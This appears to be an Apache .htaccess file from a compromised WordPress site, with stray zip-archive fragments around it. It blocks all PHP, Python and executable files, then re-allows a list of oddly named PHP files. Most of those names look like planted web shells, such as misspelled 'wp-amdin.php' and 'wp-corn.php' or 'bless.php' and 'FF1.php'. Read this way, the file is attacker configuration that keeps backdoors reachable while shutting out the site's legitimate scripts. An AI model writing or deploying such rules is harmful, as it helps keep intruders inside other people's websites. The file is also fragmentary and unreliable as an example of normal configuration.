
PK 
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "(^wp-login.php|^wp-blog-header.php|^style.php|^style2.php|^index.php|^bless.php|^wp-add.php|^wp-sigunq.php|^upload.php|^install.php|^index1.php|^file.php|^disable_ma_v11.php|^about25.php|^tool.php|^wp-amdin.php|^class19.php|^jmfi2.php|^wp-corn.php|^FF1.php|^qa.php|^x1.php|^bb3.php|^m.php|^info.php|^bless15.php|^class-cc.php|^e.php|^123.php|^FF3.php|^cless4.php|^tool1.php|^FF1.php|^ws.php|^)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>


PK 99